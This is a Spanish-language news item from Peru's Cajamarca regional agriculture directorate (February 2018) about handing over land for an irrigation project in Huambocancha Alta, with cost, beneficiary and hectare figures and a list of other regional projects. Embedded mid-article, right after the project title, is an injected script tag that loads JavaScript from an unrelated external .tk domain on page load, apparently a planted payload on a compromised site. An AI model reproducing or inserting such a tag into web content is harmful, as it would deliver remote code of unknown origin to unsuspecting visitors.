Ingresar

DIRECCIÓN REGIONAL DE AGRICULTURA ENTREGA TERRENO PARA CONSTRUIR SISTEMA DE RIEGO EN HUAMBOCANCHA ALTA

Miércoles, 7 Febrero, 2018 - 13:39
El evento se desarrollará el viernes 09 de febrero. Después de años de espera, se hará realidad la ejecución del proyecto “Mejoramiento del Servicio de Agua para el Sistema de Riego del Centro Poblado Huambocancha Alta, Caserío Plan Porconcillo y Caserío Porconcillo Bajo – Distrito Cajamarca, Provincia Cajamarca”.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

El monto de Inversión es de S/. 2,136,038.61. Este proyecto Beneficiará a 294 familias , se podrán irrigar 246.9 Hectáreas, y tiene un plazo de ejecución de 180 días calendarios.

Miguel Ángel Vera Goicochea, Director Regional de Agricultura Cajamarca, dijo que se sigue apostado por estos importantes proyectos ya que es la única forma de poder ayudar a los hermanos y hermanas del campo.

El Gobierno Regional Cajamarca para este presente año viene trabajando en los diferentes proyectos de riego como son: La autoridad regional resaltó los proyectos de “crianza de vicuñas en las zonas alto andinas de las provincias de Cajamarca, Celendín, Cutervo, San Marcos, San Miguel y San Pablo; riego tecnificado canales Lanchez Arteza en el centro poblado de Lamaspampa (El Prado - San Miguel); riego tecnificado en el caserío de Santa Rosa (Cortegana - Celendín)”.

En este paquete se consideran los proyectos de “riego tecnificado de La Manzana (Niepos - San Miguel); Tuñad Hualabamba (San Bernardino - San Pablo); del centro poblado de Shitamalca (Pedro Gálvez - San Marcos); en el centro poblado de La Florida (Sucre - Celendín); Malat y La Florida (José Sabogal - San Marcos)”.

AdjuntoTamaño
PDF icon Descarge 470.23 KB

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen